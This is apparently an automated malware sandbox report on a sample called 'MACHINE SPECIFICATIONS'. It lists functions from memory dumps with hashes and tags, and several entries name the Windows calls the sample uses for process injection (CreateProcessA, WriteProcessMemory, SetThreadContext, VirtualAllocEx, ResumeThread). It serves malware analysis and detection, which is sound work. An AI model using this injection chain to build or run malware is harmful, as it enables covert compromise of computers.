                                                                                    Function 00D95BB8 Relevance: .6, Instructions: 632COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.268173769.0000000000D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D90000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_d90000_MACHINE SPECIFICATIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 1d8b1fabbef37dca0a007dd5dbea6159f90c6951a00c9a35ce79f450369fbb18
                                                                                    • Instruction ID: d318137404b7b2893202186f49c1e173717f6306fec6717cf6d24df7ea28b672
                                                                                    • Opcode Fuzzy Hash: 1d8b1fabbef37dca0a007dd5dbea6159f90c6951a00c9a35ce79f450369fbb18
                                                                                    • Instruction Fuzzy Hash: B932AF30B046198FCF25DF78D898A6E77A2BF85704B298069E506DB369DB31DC41CBA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00F44D70 Relevance: .6, Instructions: 621COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.268299661.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_f40000_MACHINE SPECIFICATIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a7ae177cf68d9e49d7c02a6bc93ed3f38b88140550bcdafd63beb97711f51af2
                                                                                    • Instruction ID: 55ea02710411cf0b3a9c12917267da9815f876addc37ba307e0930f0eaae5417
                                                                                    • Opcode Fuzzy Hash: a7ae177cf68d9e49d7c02a6bc93ed3f38b88140550bcdafd63beb97711f51af2
                                                                                    • Instruction Fuzzy Hash: 1732B135A042158FCB05CF65C89099EBBF3FF89310B15C5A9E905AB366DB31ED45CBA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00F43BA7 Relevance: .6, Instructions: 611COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.268299661.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_f40000_MACHINE SPECIFICATIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 097b62bf75bdce4af2c44b3f077f52f804215f60c441fcddf56199fbd2de264f
                                                                                    • Instruction ID: 82759ca442e407185c079e9c6d0571fc8b8b9e63defdb64cda287b4df59d3476
                                                                                    • Opcode Fuzzy Hash: 097b62bf75bdce4af2c44b3f077f52f804215f60c441fcddf56199fbd2de264f
                                                                                    • Instruction Fuzzy Hash: CD428E71A00605CFCB15CF68C984AAEBBF2FF88310B258659D846AB751D734F982DF94
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00D90498 Relevance: .6, Instructions: 564COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.268173769.0000000000D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D90000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_d90000_MACHINE SPECIFICATIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 68fcd28fc8f11c8c3469bfb517c2b0059bf680039763b1e3c6c4a638ccd983ec
                                                                                    • Instruction ID: 3b3eec3887add2d067627a7f09adb170531e6723afebdcef115fa40a536d43e2
                                                                                    • Opcode Fuzzy Hash: 68fcd28fc8f11c8c3469bfb517c2b0059bf680039763b1e3c6c4a638ccd983ec
                                                                                    • Instruction Fuzzy Hash: D7226D31B005189FCB15DBA8C850A6A7BA3EF89704B1580A8E20ADF776DF31DD41DBA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00F402B8 Relevance: .5, Instructions: 520COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.268299661.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_f40000_MACHINE SPECIFICATIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 18bd6c4940869cebdd9b358862cad2f88e423ea5d477b14fa3ac7ec20237239d
                                                                                    • Instruction ID: 03b1cc64ee0d40fdebcf02daaf68b4a1905952d7428d259cc00ed7c6233d33ee
                                                                                    • Opcode Fuzzy Hash: 18bd6c4940869cebdd9b358862cad2f88e423ea5d477b14fa3ac7ec20237239d
                                                                                    • Instruction Fuzzy Hash: 1822E231A042558FCB15CF65C4908AEBBF3FF89300B19C5AAE5499B266DB34ED45CFA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00D9D668 Relevance: .4, Instructions: 398COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.268173769.0000000000D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D90000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_d90000_MACHINE SPECIFICATIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 4c813728bd0d884c67b73687f97d3f29f2ed9c3973662b8b4e8511a319f07cd2
                                                                                    • Instruction ID: cf8060701d42d3cfa7b48dee15ceeadd9a679e2beded43a5d838c85b7eaf36cc
                                                                                    • Opcode Fuzzy Hash: 4c813728bd0d884c67b73687f97d3f29f2ed9c3973662b8b4e8511a319f07cd2
                                                                                    • Instruction Fuzzy Hash: 4AF1E630A046158FCB05CFA9C8909AEBBF3FFC9300B19C56AD549A7266D734ED45CBA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00D99A50 Relevance: .4, Instructions: 370COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.268173769.0000000000D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D90000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_d90000_MACHINE SPECIFICATIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 2f5886055d62cf8a940d89d4cb0010ffcda41a635c0b298b4b793a160a0f4bc9
                                                                                    • Instruction ID: 5dd29ff22baa99ede55df7b0cd15c7715928c9bc522cedfa7b69acd052d444eb
                                                                                    • Opcode Fuzzy Hash: 2f5886055d62cf8a940d89d4cb0010ffcda41a635c0b298b4b793a160a0f4bc9
                                                                                    • Instruction Fuzzy Hash: EFD19E31A056068FCF14CB6DD8E0AAEF7F2EF84314B1A846DE505DB256DB75EC418B60
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00D99558 Relevance: .3, Instructions: 297COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.268173769.0000000000D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D90000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_d90000_MACHINE SPECIFICATIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 7425ffa30cbf975b32140eb8c42c48759db3f2d95c0cc0c1a7c821ad90e96d09
                                                                                    • Instruction ID: 124fa1db0739ba76362d5719c7c29cb09bb3b1c8f98e5e8ff50e343f15d87a9c
                                                                                    • Opcode Fuzzy Hash: 7425ffa30cbf975b32140eb8c42c48759db3f2d95c0cc0c1a7c821ad90e96d09
                                                                                    • Instruction Fuzzy Hash: 67C13C35A00219DFCB05CF68C89499DFBB2FF49314B5AC659E809AB365D731ED82CB90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00D99548 Relevance: .3, Instructions: 271COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.268173769.0000000000D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D90000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_d90000_MACHINE SPECIFICATIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 133fdcedaff2f360a0ede990ef63b73c9109742b8e97d52a8f9347ed2265eaf0
                                                                                    • Instruction ID: 7afb31851436bae8cd87df3903730ea169a51e362dbca565413e06e4f8fa8a80
                                                                                    • Opcode Fuzzy Hash: 133fdcedaff2f360a0ede990ef63b73c9109742b8e97d52a8f9347ed2265eaf0
                                                                                    • Instruction Fuzzy Hash: FAB13835A00219DFCB05CF68C89499DFBB2FF49314B5AC659E809AB361D731ED82CB90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00F48514 Relevance: 1.7, APIs: 1, Instructions: 247processCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00F48756
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.268299661.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_f40000_MACHINE SPECIFICATIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateProcess
                                                                                    • String ID:
                                                                                    • API String ID: 963392458-0
                                                                                    • Opcode ID: 8a5ae5e063ec7a9bb1a58bf6c0cab87250e7f2141a39e74aa7c33e2d123657a4
                                                                                    • Instruction ID: da6f95b46e464b3c1a1c777e375d528081f7315af05074b456fe275c4f5995b2
                                                                                    • Opcode Fuzzy Hash: 8a5ae5e063ec7a9bb1a58bf6c0cab87250e7f2141a39e74aa7c33e2d123657a4
                                                                                    • Instruction Fuzzy Hash: 74A15D71D002198FDF10DFA4C881BEEBBB2BF44364F1585A9D809A7240DB749D86DF91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00F48520 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00F48756
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.268299661.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_f40000_MACHINE SPECIFICATIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateProcess
                                                                                    • String ID:
                                                                                    • API String ID: 963392458-0
                                                                                    • Opcode ID: d33d223365d74cd86cfd073ddd52c49edde2009b36b834255fa4603d3cae8bac
                                                                                    • Instruction ID: a0b5bb56aef934af42478e77fb9ca59cd3ef46701d477f15b130bfcaaf2cf24c
                                                                                    • Opcode Fuzzy Hash: d33d223365d74cd86cfd073ddd52c49edde2009b36b834255fa4603d3cae8bac
                                                                                    • Instruction Fuzzy Hash: 27913C71D002198FDF10DFA4C881BEEBBB2BF44364F1585A9D809A7280DB749D86DF91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00D90BDC Relevance: 1.6, APIs: 1, Instructions: 100libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadLibraryA.KERNELBASE(?), ref: 00D90CD7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.268173769.0000000000D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D90000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_d90000_MACHINE SPECIFICATIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID: LibraryLoad
                                                                                    • String ID:
                                                                                    • API String ID: 1029625771-0
                                                                                    • Opcode ID: 5d99f2e5b68f822387f23729280d025722147b5971c13e183c0f3d3c415c7cc9
                                                                                    • Instruction ID: a2a1a392c468314a8379bf3f43c112605fc848fce914d1cecf110199433aada2
                                                                                    • Opcode Fuzzy Hash: 5d99f2e5b68f822387f23729280d025722147b5971c13e183c0f3d3c415c7cc9
                                                                                    • Instruction Fuzzy Hash: 7C4136B0D002189FDB10CFA9E98579EBFF1EB48314F148129E815AB284D774A845CFA5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00D90158 Relevance: 1.6, APIs: 1, Instructions: 99libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadLibraryA.KERNELBASE(?), ref: 00D90CD7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.268173769.0000000000D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D90000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_d90000_MACHINE SPECIFICATIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID: LibraryLoad
                                                                                    • String ID:
                                                                                    • API String ID: 1029625771-0
                                                                                    • Opcode ID: 41a063f521083eccbff26db605de993f7cb35b06313c7fa466d2cab155b00bb0
                                                                                    • Instruction ID: fd29033b0359ad8cbca5cb922ad16b373a3e60275a960a932f71a04aaf76dae8
                                                                                    • Opcode Fuzzy Hash: 41a063f521083eccbff26db605de993f7cb35b06313c7fa466d2cab155b00bb0
                                                                                    • Instruction Fuzzy Hash: 824127B0D006189FDF10CFA9E98579EBFF5EB48714F14812AE815A7344D774A845CBA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00F48AB0 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 00F48B40
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.268299661.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_f40000_MACHINE SPECIFICATIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID: MemoryProcessWrite
                                                                                    • String ID:
                                                                                    • API String ID: 3559483778-0
                                                                                    • Opcode ID: 263a9af34ca5a91a2b2e52743e50744486f83c486baecb43cded9aa36e82b1e9
                                                                                    • Instruction ID: 8b7fefadae22833a0f3a5151def3c99dec852fecd6378b539f87fd5924525c6d
                                                                                    • Opcode Fuzzy Hash: 263a9af34ca5a91a2b2e52743e50744486f83c486baecb43cded9aa36e82b1e9
                                                                                    • Instruction Fuzzy Hash: 872117B19002199FCF10CFA9C884BEEBBF5FB88354F108429E918A7240DB789945DBA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00F48AAB Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 00F48B40
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.268299661.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_f40000_MACHINE SPECIFICATIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID: MemoryProcessWrite
                                                                                    • String ID:
                                                                                    • API String ID: 3559483778-0
                                                                                    • Opcode ID: d4b829a01279d4a20d6edc65e26f31991caec4661cb5930cfe254518805e230f
                                                                                    • Instruction ID: 0d84e8db3fbab968c3a1ddaf221e984df9a70ab0b5e78123a0bee09193155f9e
                                                                                    • Opcode Fuzzy Hash: d4b829a01279d4a20d6edc65e26f31991caec4661cb5930cfe254518805e230f
                                                                                    • Instruction Fuzzy Hash: D02119B1D002599FCF50CFA9C8847EEBBB5FF88354F10842EE954A7240DB749945DBA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00F45ED0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetKernelObjectSecurity.KERNELBASE(?,?,00000000), ref: 00F45F56
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.268299661.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_f40000_MACHINE SPECIFICATIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID: KernelObjectSecurity
                                                                                    • String ID:
                                                                                    • API String ID: 3015937269-0
                                                                                    • Opcode ID: fa498d9331ce33dce275104cec1cbca696814010d688e1678339ffa065f04c58
                                                                                    • Instruction ID: dee3257f9d9488142e7aebf93c470c438b71ca36128f00f93f4a95a1615f37e6
                                                                                    • Opcode Fuzzy Hash: fa498d9331ce33dce275104cec1cbca696814010d688e1678339ffa065f04c58
                                                                                    • Instruction Fuzzy Hash: AC212A71D046498FCB10CFA9C484BEEBFF4EB88324F15812DE859A7641D774A945CFA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00F488A4 Relevance: 1.6, APIs: 1, Instructions: 63threadinjectionCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetThreadContext.KERNELBASE(?,00000000), ref: 00F48926
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.268299661.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_f40000_MACHINE SPECIFICATIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID: ContextThread
                                                                                    • String ID:
                                                                                    • API String ID: 1591575202-0
                                                                                    • Opcode ID: e768f4792282dc4198e9f298050f64b49b4613a5c0d1e5a8d21696c53445ea96
                                                                                    • Instruction ID: b14743d63e1a7203c1feef35e65693d32dc80f381a754695aecbc6bee98a429b
                                                                                    • Opcode Fuzzy Hash: e768f4792282dc4198e9f298050f64b49b4613a5c0d1e5a8d21696c53445ea96
                                                                                    • Instruction Fuzzy Hash: 75217971D002098FCB10DFAAC4847EEBBF4EF88368F14842ED558A7241DB789945CFA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00F488A8 Relevance: 1.6, APIs: 1, Instructions: 63threadinjectionCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetThreadContext.KERNELBASE(?,00000000), ref: 00F48926
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.268299661.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_f40000_MACHINE SPECIFICATIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID: ContextThread
                                                                                    • String ID:
                                                                                    • API String ID: 1591575202-0
                                                                                    • Opcode ID: ade2c9309283191bb64f6071a94563627f78f4b3a39f93a6b879f85125303893
                                                                                    • Instruction ID: 4013eec62ffcfeb552597876e0b5d94298bb792c563cee93c13cddce94dd4cba
                                                                                    • Opcode Fuzzy Hash: ade2c9309283191bb64f6071a94563627f78f4b3a39f93a6b879f85125303893
                                                                                    • Instruction Fuzzy Hash: 4D213A71D006098FCB10DFAAC4847EEBBF4EF48364F14842DD559A7241DB789945CFA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00F45ED8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetKernelObjectSecurity.KERNELBASE(?,?,00000000), ref: 00F45F56
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.268299661.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_f40000_MACHINE SPECIFICATIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID: KernelObjectSecurity
                                                                                    • String ID:
                                                                                    • API String ID: 3015937269-0
                                                                                    • Opcode ID: 59e37df7fa00196a75c6c59eca170d904e2edb0ae9c786655a528f7182ed560f
                                                                                    • Instruction ID: ffbda64043898bd13690eb910cfba9aa38ae863ded4477d06d4ad7708f8dd35d
                                                                                    • Opcode Fuzzy Hash: 59e37df7fa00196a75c6c59eca170d904e2edb0ae9c786655a528f7182ed560f
                                                                                    • Instruction Fuzzy Hash: B0213BB1D006099FCB10DF9AC484BEEBBF4EF88324F148429E519A7341D778A945CFA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00D90F48 Relevance: 1.6, APIs: 1, Instructions: 59memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • VirtualProtect.KERNELBASE(?,?,?,?), ref: 00D90FC4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.268173769.0000000000D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D90000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_d90000_MACHINE SPECIFICATIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID: ProtectVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 544645111-0
                                                                                    • Opcode ID: 9f28728f7c403d9046b5b25799e249afc34a9f609c9a56e622c92d19f0016d67
                                                                                    • Instruction ID: 71975dd5713d45d1ec591d6ffa69983e7f763116f84a3cc6de2792a02a164caa
                                                                                    • Opcode Fuzzy Hash: 9f28728f7c403d9046b5b25799e249afc34a9f609c9a56e622c92d19f0016d67
                                                                                    • Instruction Fuzzy Hash: B02115B19042099FCB10DFAAD884AEEFBF4FF48324F14842AE519A7210DB749945CFA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00F454A8 Relevance: 1.6, APIs: 1, Instructions: 58memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • VirtualProtect.KERNELBASE(?,?,?,?), ref: 00F45523
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.268299661.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_f40000_MACHINE SPECIFICATIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID: ProtectVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 544645111-0
                                                                                    • Opcode ID: ff39c39be1fae30be886d9f69f5637e52ff18462b3ee30102c5997119478a1b4
                                                                                    • Instruction ID: 308bebdd46996729121601b63c4380d4da3e73c262fdcb7bcd49a148681198da
                                                                                    • Opcode Fuzzy Hash: ff39c39be1fae30be886d9f69f5637e52ff18462b3ee30102c5997119478a1b4
                                                                                    • Instruction Fuzzy Hash: 4E2127B1D046499FCB10CF9AD884BEEBFF4FB48324F14806AE858A7241D3789545CFA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00D90F50 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • VirtualProtect.KERNELBASE(?,?,?,?), ref: 00D90FC4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.268173769.0000000000D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D90000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_d90000_MACHINE SPECIFICATIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID: ProtectVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 544645111-0
                                                                                    • Opcode ID: 122ff053ff08760bd5cc885d00c7e815a11d31af7fbda60ec1d74fa9a3bb13a2
                                                                                    • Instruction ID: c0837a4b11e08269dbbe7b5021931b2f28e95821eabe04b7efc7e422ab6a0cdb
                                                                                    • Opcode Fuzzy Hash: 122ff053ff08760bd5cc885d00c7e815a11d31af7fbda60ec1d74fa9a3bb13a2
                                                                                    • Instruction Fuzzy Hash: 7D11E5B19042099FCB10DFAAD484AEEFBF5EF48324F14842AD519A7210D7749945CFA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00F454B0 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • VirtualProtect.KERNELBASE(?,?,?,?), ref: 00F45523
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.268299661.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_f40000_MACHINE SPECIFICATIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID: ProtectVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 544645111-0
                                                                                    • Opcode ID: c71387b7a2974fa476d0abcab7604821e7b19b7357441224f90a0da4413c976b
                                                                                    • Instruction ID: 08aac83191eb1b961ef50638f3539d28e349dc6b0995740a33e390342de15453
                                                                                    • Opcode Fuzzy Hash: c71387b7a2974fa476d0abcab7604821e7b19b7357441224f90a0da4413c976b
                                                                                    • Instruction Fuzzy Hash: D921F9B5D006099FCB10DF9AD484BEEFBF4FB48324F148429E958A7641D378A644DFA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00F48C51 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00F48CC6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.268299661.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_f40000_MACHINE SPECIFICATIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 4275171209-0
                                                                                    • Opcode ID: 21ed5dc47f56c78f7977dcaa52705f0ab4078eb2f9298fa1fb1c46ef7c48a0cb
                                                                                    • Instruction ID: 8796d58e71ee1477a3d91da677c74211a18200bf42a395b0fd08a288f9357183
                                                                                    • Opcode Fuzzy Hash: 21ed5dc47f56c78f7977dcaa52705f0ab4078eb2f9298fa1fb1c46ef7c48a0cb
                                                                                    • Instruction Fuzzy Hash: 191156729002489FCF10DFA9D884AEFBFF5EF88324F248419E615A7210CB759945DFA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00F48C58 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00F48CC6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.268299661.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_f40000_MACHINE SPECIFICATIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 4275171209-0
                                                                                    • Opcode ID: f7c159be979dbaae659fe938e7a3ab8a6f6281ba2a075159ec1253b971e90442
                                                                                    • Instruction ID: c2a2aaef84fc5f25bb6b6ac8339282f4ec9f22cf7d442dd3bf71f58d89d6670d
                                                                                    • Opcode Fuzzy Hash: f7c159be979dbaae659fe938e7a3ab8a6f6281ba2a075159ec1253b971e90442
                                                                                    • Instruction Fuzzy Hash: 411126719002099FCF10DFAAD844AEFBFF5EB88324F148419E615A7250CB75A945DBA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00F48D11 Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ResumeThread.KERNELBASE(?), ref: 00F48D7A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.268299661.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_f40000_MACHINE SPECIFICATIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID: ResumeThread
                                                                                    • String ID:
                                                                                    • API String ID: 947044025-0
